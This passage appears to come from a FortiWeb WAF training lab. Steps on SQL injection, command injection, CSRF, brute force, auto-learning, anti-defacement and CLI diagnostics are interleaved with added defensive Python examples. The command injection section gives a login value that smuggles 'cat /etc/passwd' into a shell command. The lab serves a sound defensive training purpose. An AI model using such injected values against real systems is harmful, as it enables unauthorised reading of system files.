    2. Check to see if your login attempt gets blocked

    Prevent SQL Injection Server Protection > Review Log

    Navigate to Log & Report > Log Access > Attack and search for the SQL Injection attack you just completed

    Prevent SQL Injection Summary

    1. Instead of using Server Protection signatures, you could also use parameter validation to prevent SQL Injection, like we did in the Cross Site Scripting lab
    2. To accomplish this, edit the Server Protection Rule and disable the SQL Injection signatures
    3. Go to Parameter Validation > Input Rule and create a new one: Request URL: /verify_admin.php. Verify parameters txtUser and txtPassword. Enforce a maximum of 8 (eight) alphanumeric characters (use regex [A-Za-z0-9])
    4. Assign the new Input Rule to the already applied Parameter Validation Rule


    Command Injection: A look at verify_admin.php


    The exec() function executes an operating system command.

    In this case exec() is generating log entries for successful and failed logins and is using the variable $log.

    Command Injection Executing commands

    1. Disable Parameter Validation rules in xbank_web_protection
    2. Since the login field value is being used by the exec() command without validating it first, it is possible to inject some commands there:
        Login: myuser; cat /etc/passwd > salida.txt ; echo
        Password: whatever
    3. Take a look at the command executed by the application:
        exec("echo 2011-05-21 15:20:10: User myuser; cat /etc/passwd > salida.txt ; echo logged in failed >> log/logins.txt")
    4. You just copied the content of /etc/passwd to a file in the site's root directory, salida.txt

    Command Injection Executing commands (2)

    5. Go to the HTTP Server (Linux) and see if the file /var/www/xbank/salida.txt exists
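As an added illustration (not code from the deck or from verify_admin.php) of why the Input Rule from the SQL Injection summary also stops this, the Python below mirrors the lab's 8-alphanumeric-character rule, rebuilds the log command string the way the PHP page does so the number of separate commands a shell would run can be counted, shows the shell-quoted version, and finally logs the attempt without invoking a shell at all. Function names and the constructed login value are assumptions of this example; the unsafe command string is only built and inspected, never executed.

```python
import os
import re
import shlex
import tempfile
from datetime import datetime

# Same constraint as the lab's Input Rule for txtUser / txtPassword: 1 to 8 alphanumerics.
CREDENTIAL_FIELD_RE = re.compile(r"^[A-Za-z0-9]{1,8}$")


def field_is_valid(value):
    """True when the value would pass the FortiWeb input rule described in the lab."""
    return CREDENTIAL_FIELD_RE.fullmatch(value) is not None


def build_log_command_unsafe(user, ok, logfile, when):
    """The verify_admin.php pattern: the login is concatenated into a shell command line.
    Returned as a string only; this example never runs it."""
    status = "logged in ok" if ok else "logged in failed"
    return "echo " + when + ": User " + user + " " + status + " >> " + logfile


def build_log_command_quoted(user, ok, logfile, when):
    """Same command with every user-controlled piece passed through shlex.quote."""
    status = "logged in ok" if ok else "logged in failed"
    return "echo " + shlex.quote(when + ": User " + user + " " + status) + " >> " + shlex.quote(logfile)


def shell_command_count(command):
    """How many separate commands a POSIX shell would run for this line.
    shlex with punctuation_chars emits unquoted ';', '&&', '||' and '|' as their own tokens,
    while the same characters inside quotes stay part of a word."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lexer if tok in (";", "&&", "||", "|"))


def log_login_attempt(user, ok, logfile, when=None):
    """Hardened replacement: validate first, then append to the log file directly (no shell)."""
    if not field_is_valid(user):
        raise ValueError("login field rejected by input rule")
    when = when or datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    status = "logged in ok" if ok else "logged in failed"
    with open(logfile, "a", encoding="utf-8") as fh:
        fh.write(f"{when}: User {user} {status}\n")
    return True


def log_to_temp(user, ok, when):
    """Helper for quick checks: log into a throwaway file and return its contents."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "logins.txt")
        log_login_attempt(user, ok, path, when)
        with open(path, encoding="utf-8") as fh:
            return fh.read()


if __name__ == "__main__":
    # Constructed login value with shell metacharacters, milder than the lab's payload.
    injected = "myuser; id ; echo"
    when = "2011-05-21 15:20:10"
    print("input rule accepts it:", field_is_valid(injected))
    print("commands in unsafe line:", shell_command_count(build_log_command_unsafe(injected, False, "log/logins.txt", when)))
    print("commands in quoted line:", shell_command_count(build_log_command_quoted(injected, False, "log/logins.txt", when)))
```

The regex rejects the injected value before it reaches any command, shlex.quote turns the whole message into a single shell word, and writing the log line from the application itself removes the shell from the path entirely, which is the option to prefer when a WAF rule is not in front of the page.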

    Preventing Cross Site Request Forgery (CSRF)

    Discussion


    CSRF Attacking www.xbank.com > run attack

    Search for the file csrf_page.html in the resource provided and double-click it


    CSRF Attacking www.xbank.com (2)

    7. Let's take a look at csrf_page.html

    Prevent CSRF Applying business logic

    One way of preventing CSRF is enforcing the session to follow the application logic.

    For instance, to perform a withdrawal in www.xbank.com you should first go through:

    1. verify_admin.php
    2. do_transaction.php
    3. save_transaction.php

    The Page Access Rule functionality enforces business logic by means of a cookie, FORTIWAFSID
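An added Python model (not FortiWeb's code) of the ordering the Page Access Rule enforces: a session may only request a step of the withdrawal flow after it has requested the previous step, and completing the flow resets the session so the next withdrawal must start over. The class name, the reset behaviour and the treatment of requests with no session id are assumptions of this example; the URL order is the one listed above.

```python
# Ordered withdrawal flow from the slides; step N is only allowed right after step N-1.
WITHDRAWAL_FLOW = ["/verify_admin.php", "/do_transaction.php", "/save_transaction.php"]


class PageAccessEnforcer:
    """Per-session ordering check, keyed by the session cookie value (FORTIWAFSID in the lab).
    Simplified model of the Page Access Rule idea, not the product's implementation."""

    def __init__(self, flow):
        self.flow = list(flow)
        self.last_step = {}     # session id -> index of the flow step last requested
        self.violations = []    # (session id, url) pairs that were denied

    def check(self, session_id, url):
        """Return True when the request is allowed, False (and record it) when it breaks the order."""
        if url not in self.flow:
            return True                      # pages outside the flow are not restricted
        step = self.flow.index(url)
        last = self.last_step.get(session_id, -1)
        if step == 0 or last == step - 1:
            # finishing the flow resets the session; a new withdrawal must start at step 0
            self.last_step[session_id] = -1 if step == len(self.flow) - 1 else step
            return True
        self.violations.append((session_id, url))
        return False

    def replay(self, requests):
        """Evaluate a list of (session id, url) pairs; returns the allow/deny decision for each."""
        return [self.check(sid, url) for sid, url in requests]


if __name__ == "__main__":
    # Constructed traffic: a legitimate withdrawal, then a forged request that skips ahead.
    enforcer = PageAccessEnforcer(WITHDRAWAL_FLOW)
    legit = [("s1", u) for u in WITHDRAWAL_FLOW]
    forged = [("s1", "/save_transaction.php")]
    for (sid, url), ok in zip(legit + forged, enforcer.replay(legit + forged)):
        print(sid, url, "allowed" if ok else "DENIED")
```

A forged request that jumps straight to save_transaction.php is denied even though the victim's browser sends a valid session cookie. This only enforces order; a per-request anti-CSRF token inside the application remains the complementary control.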


    Prevent CSRF Applying business logic (3)

    1. Name Policy: page_access1


    2. Click OK to save
    3. Click Create New to create a new rule
    4. Enable Host Status
    5. Select Host from dropdown
    6. Specify Match Type: RegEx
    7. Add URL Pattern
    8. Click OK to Save
    9. Repeat for Additional URLs

    Prevent CSRF Applying business logic (3)


    Final Results of CSRF Rules Page

    Prevent CSRF Applying business logic (4)

    1. Edit xbank_web_protection

    2. Enable Session Management

    3. Select the recently created page access rule

    NOTE: In order to enforce business logic, the FortiWeb must be session aware. That's why it is mandatory to enable session management.


    Prevent CSRF Testing Configuration > Check Balance

    1. Log back into www.xbank.com
    2. Stay at the account listing page and review balance

    Prevent CSRF Testing Configuration > Rerun attack

    Open your browser cookie viewer and search for the cookie FORTIWAFSID
    Double click csrf_page.html
    Review your balance

    Prevent CSRF Testing Configuration > Verify No change


    Any change?

    Prevent CSRF Testing Configuration > Check Attack Logs


    Brute Force Attacks


    Brute Force Attacks

    Discussion


    What is Enable Share IP?

    Some source IP addresses represent 1 single computer, but other source IP addresses represent 100 or 1000 computers. This is caused by source hide NAT.

    Some FWB policies provide access rate limits. A rate limit applied to 1 computer should be smaller than a rate limit applied to 500 computers. Thus there are 2 configuration values.

    How does FWB determine that multiple connections originate from more than 1 computer? Instead of only counting hits by source IP, it counts hits by source IP + ID field in the IP header (non-contiguous numbers).
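An added Python example (not FortiWeb's implementation) of the two-threshold idea described above: hits are counted per source IP inside a sliding window, and the IP header ID values seen from that address are used to estimate how many hosts sit behind it, so a NAT gateway gets the larger limit while a single machine gets the smaller one. The "stream" heuristic (an ID that continues a counter already seen belongs to the same host), the id_gap tolerance, the class and method names and the sample addresses are assumptions of this example.

```python
from collections import deque


class SharedIpRateLimiter:
    """Per-source-IP hit counting with a host estimate derived from IP header ID values.
    Simplified model of the Share IP behaviour the slide describes, not the product's algorithm."""

    def __init__(self, single_host_limit, shared_ip_limit, window_seconds=10, id_gap=32):
        self.single = single_host_limit   # hits per window allowed for one computer
        self.shared = shared_ip_limit     # hits per window allowed for a NAT'd address
        self.window = window_seconds
        self.id_gap = id_gap              # max forward jump that still counts as the same ID counter
        self.hits = {}                    # src ip -> deque of hit timestamps
        self.streams = {}                 # src ip -> last IP ID seen for each inferred host

    def _host_count(self, src, ip_id):
        """Attach ip_id to an existing counter stream if it continues one, else start a new host."""
        streams = self.streams.setdefault(src, [])
        for i, last in enumerate(streams):
            if 0 <= (ip_id - last) % 65536 <= self.id_gap:
                streams[i] = ip_id
                return len(streams)
        streams.append(ip_id)
        return len(streams)

    def estimated_hosts(self, src):
        return len(self.streams.get(src, []))

    def hit(self, src, ip_id, now):
        """Record one request from src with IP header ID ip_id at time now (seconds).
        Returns True if it is within the applicable limit, False if it should be rate-limited."""
        q = self.hits.setdefault(src, deque())
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        hosts = self._host_count(src, ip_id)
        limit = self.single if hosts == 1 else self.shared
        return len(q) <= limit


if __name__ == "__main__":
    # Constructed traffic: one host with a sequential ID counter, then two hosts behind one NAT.
    rl = SharedIpRateLimiter(single_host_limit=5, shared_ip_limit=20)
    print([rl.hit("203.0.113.5", 1000 + i, i * 0.1) for i in range(6)])
    rl2 = SharedIpRateLimiter(single_host_limit=5, shared_ip_limit=20)
    ids = [1000, 40000, 1001, 40001, 1002, 40002]
    print([rl2.hit("203.0.113.6", ids[i], i * 0.1) for i in range(6)], rl2.estimated_hosts("203.0.113.6"))
```

Caveat: a single host whose IP stack randomizes the ID field would look like many hosts and receive the looser limit, so the estimate is a hint for choosing a threshold, not an identity; keep the shared limit modest and watch the attack log when Share IP is enabled.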


    Configuring Brute Force Login Rule > Enable Share IP

    1. Navigate to Share IP

    2. Select Enable Share IP

    3. Click Apply to save

    Configuring Brute Force Login Rule > Enable Policy

    1. Edit Inline Protection Profile xbank_web_protection

    2. Select Brute Force Login

    Configuring Brute Force Login Rule (3)

    Apply the Brute Force Login rule to xbank_web_protection
    Access http://www.xbank.com/login.html
    Refresh your browser as fast as you can until you get banned for 10 seconds (F5, Command + R, etc.)

    Configuring Brute Force Login Rule > Review Attack Log


    Auto-Learning


    FortiWeb Learning Mode

    FortiWeb Deployment Auto-Learning

    Any WAF deployment requires some knowledge of the application. This adds complexity to the deployment.

    Auto-Learning is a mode that can help during the deployment phase to create a baseline based on the observed behavior.

    Configuring Auto-Learning

    1. Go to Auto Learn > Auto Learn Profile > Default Auto Learn Profile and create a new Inline Profile named xbank-auto
    2. Go to Server Policy > Policy, edit xbank_web_policy and assign
        Web Protection Profile: Inline Alert Only
        WAF Auto Learn Profile: xbank-auto


    Configuring Auto-Learning > Create a new Profile (2)

    1. Name Profile
    2. Specify Profile Settings
    3. Click OK to save

    Configuring Auto-Learning > Check Session Management

    1. Go to Inline Protection Profile

    2. Edit xbank_web_protection

    3. Make sure Session Management is Enabled

    Configuring Auto-Learning > Apply new Auto Learn Profile

    1. Go to Server Policy
    2. Edit xbank_web_policy
    3. Select Auto Learn Profile
    4. Enable Monitoring Mode

    Configuring Auto-Learning > Test WAF Auto Learn Profile

    1. Access the XBANK site and navigate on it. Try to access every page, make transfers, update profile, etc.
    2. Go to Auto Learn > Auto Learn Report in the FortiWeb
    3. Review the report automatically generated by the auto-learn feature
    4. Download the Report as PDF and review it
    5. Note that it is possible to edit and adjust some of the results
    6. Generate Configuration based on the Auto-Learn report

    Configuring Auto-Learning > Auto Learn Report

    1. Generate Config
    2. Name Profile
    3. Click OK to save

    Pay special attention to the Parameter Validation rules

    Configuring Auto-Learning > Review generated configuration


    Anti-Defacement Tool

    Web Defacement

    A website defacement is an attack on a website that changes the visual appearance of the site or a webpage.

    FortiWeb Anti-Defacement Tool

    FortiWeb has an Anti-Defacement tool that recognizes when a web site file has been changed and reacts accordingly:

    1. Backup and create a hash for each of the site's objects
    2. Monitor each object, comparing its hash with the one registered
    3. If any change:
        Alert and manually recover the changed file
        Automatically recover the changed file
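The three steps above, as an added Python example that is not FortiWeb's code: take a baseline (copy each object to a backup location and record its SHA-256), scan for objects whose hash differs from the baseline or that have gone missing, and, when auto-restore is on, copy the baseline version back. The DefacementMonitor class, the demo() helper and the constructed two-file site it builds in a temporary directory are assumptions of this example.

```python
import hashlib
import os
import shutil
import tempfile


class DefacementMonitor:
    """Baseline, detect, restore for a directory tree. Illustrates the idea on the slide;
    a real deployment would run scan() on the configured monitor interval."""

    def __init__(self, site_root, backup_root, auto_restore=True):
        self.site_root = site_root
        self.backup_root = backup_root
        self.auto_restore = auto_restore
        self.baseline = {}      # relative path -> sha256 hex digest
        self.events = []        # (kind, relative path) for every detection

    @staticmethod
    def _digest(path):
        h = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    def _walk(self):
        for dirpath, _, files in os.walk(self.site_root):
            for name in files:
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, self.site_root), full

    def take_baseline(self):
        """Step 1: back up every object and record its hash. Returns the number of objects."""
        self.baseline = {}
        for rel, full in self._walk():
            dest = os.path.join(self.backup_root, rel)
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            shutil.copy2(full, dest)
            self.baseline[rel] = self._digest(full)
        return len(self.baseline)

    def scan(self):
        """Steps 2 and 3: compare current hashes with the baseline, record changed, missing and
        added objects, and put the backed-up copy back when auto_restore is enabled."""
        current = {rel: self._digest(full) for rel, full in self._walk()}
        changed = sorted(r for r in self.baseline if r in current and current[r] != self.baseline[r])
        missing = sorted(r for r in self.baseline if r not in current)
        added = sorted(r for r in current if r not in self.baseline)
        for rel in changed + missing:
            self.events.append(("changed" if rel in changed else "missing", rel))
            if self.auto_restore:
                dst = os.path.join(self.site_root, rel)
                os.makedirs(os.path.dirname(dst), exist_ok=True)
                shutil.copy2(os.path.join(self.backup_root, rel), dst)
        for rel in added:
            self.events.append(("added", rel))    # new files are reported, never deleted
        return {"changed": changed, "missing": missing, "added": added}


def demo():
    """Run the lab scenario on a constructed throwaway site.
    Returns (clean scan result, scan after editing login.html, whether the file was restored)."""
    with tempfile.TemporaryDirectory() as tmp:
        site = os.path.join(tmp, "xbank")
        backup = os.path.join(tmp, "backup")
        os.makedirs(site)
        original = "<h1>XBANK login</h1>\n"
        with open(os.path.join(site, "login.html"), "w", encoding="utf-8") as fh:
            fh.write(original)
        with open(os.path.join(site, "index.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php echo 'home'; ?>\n")
        monitor = DefacementMonitor(site, backup, auto_restore=True)
        monitor.take_baseline()
        clean = monitor.scan()
        with open(os.path.join(site, "login.html"), "w", encoding="utf-8") as fh:
            fh.write("<h1>defaced</h1>\n")       # the lab's "change something in its content"
        defaced = monitor.scan()
        with open(os.path.join(site, "login.html"), encoding="utf-8") as fh:
            restored = fh.read() == original
        return clean, defaced, restored


if __name__ == "__main__":
    print(demo())
```

The first scan after the baseline reports nothing; the scan after editing login.html lists it under "changed" and, because auto-restore is on, the original content is back before the function returns. Keep the backup location outside the web root and the monitoring credentials read-only wherever the product allows it, since the backup is what everything is restored from.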

    Configure Anti-Defacement Tool


    1. Go to Web Anti-Defacement

    2. Create New

    Configure Anti-Defacement Tool > Create Policy

    Go to Web Site with Anti-Defacement & Create New Policy
    Name Policy
    Set Monitor Intervals
    Enable Auto Restore
    Click OK to save
    Test Connection
        o Enable Monitoring
        o Define folder to monitor
        o Specify credentials used for monitoring


    Configure Anti-Defacement Tool > Review (2)

    Inspect the policy details and statistics


    Configure Anti-Defacement Tool > Review (3)

    Inspect the list of protected files and their attributes

    Configure Anti-Defacement Tool > Review (4)

    1. Edit the login.html file and change something in its content
    2. Wait until you see that one file has been detected as changed
    3. Inspect changes by clicking on the Total Changed files number
    4. Access the XBANK site and you will see the defaced site

    Configure Anti-Defacement Tool (8)

    Review the log file and verify the defacement event

    FortiWeb Basic Troubleshooting

    Get System Status

    # get system status


    Get System Performance

    # get system performance


    Get System Global

    # get system global


    System Top

    # diag system top
    Shows each process, its process ID, state, CPU consumption and memory consumption.
    If you press q it sorts by processor or memory consumption.

    # diag system kill
    diag system kill (process id)

    System Flash List

    # diag system flash list
    Shows the different partitions and the versions running on them. They are shown when the unit is upgraded; for example, if the upgrade does not go well, you can roll back to a previous version using the copy that the unit saved when it moved to the later version.

    Execute Options

    # execute ?

    When the ping-options are modified, traceroute is also run with respect to the ping source.

    When bringing up a FortiGate or FortiWeb, to avoid the FortiGuard registration wait time use:

    exec update-av
    exec update-ips
    exec update-now

    Resetting the log disk requires a reboot.

    Execute Ping

    # execute ping


    Execute Traceroute

    # execute traceroute

    FortiWeb Advanced Troubleshooting

    Diagnose Commands

    CLI command trees: diagnose, get


    Commonly used sub-branches

    Numerous options/parameters viewed with ?

    diag network sniffer

    diag system

    diag debug

    diag application

    get log

    get sys

    Diagnose Debug Flow

    # diagnose debug flow filter clear
    diagnose debug flow policy client-ip
    diagnose debug flow policy direction {both | client-to-server | server-to-client}
    diagnose debug flow policy server-ip
    diagnose debug flow filter server-ip 2.2.128 (physical/real IP)
    diagnose debug flow show module-process-detail on
    diagnose debug flow trace start
    diagnose debug enable

    Reference: http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.html

    Diagnose Debug Flow

    We must see:

    Crash Log

    # diagnose debug crashlog read

    Use this command to show crash logs from application proxies that have call back traces, segmentation faults, or memory register dumps, or to delete the crash log.

    Diagnose Debug Application

    # diagnose debug application autolearn [{-1 | 0}]

    http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_application_autolearn.html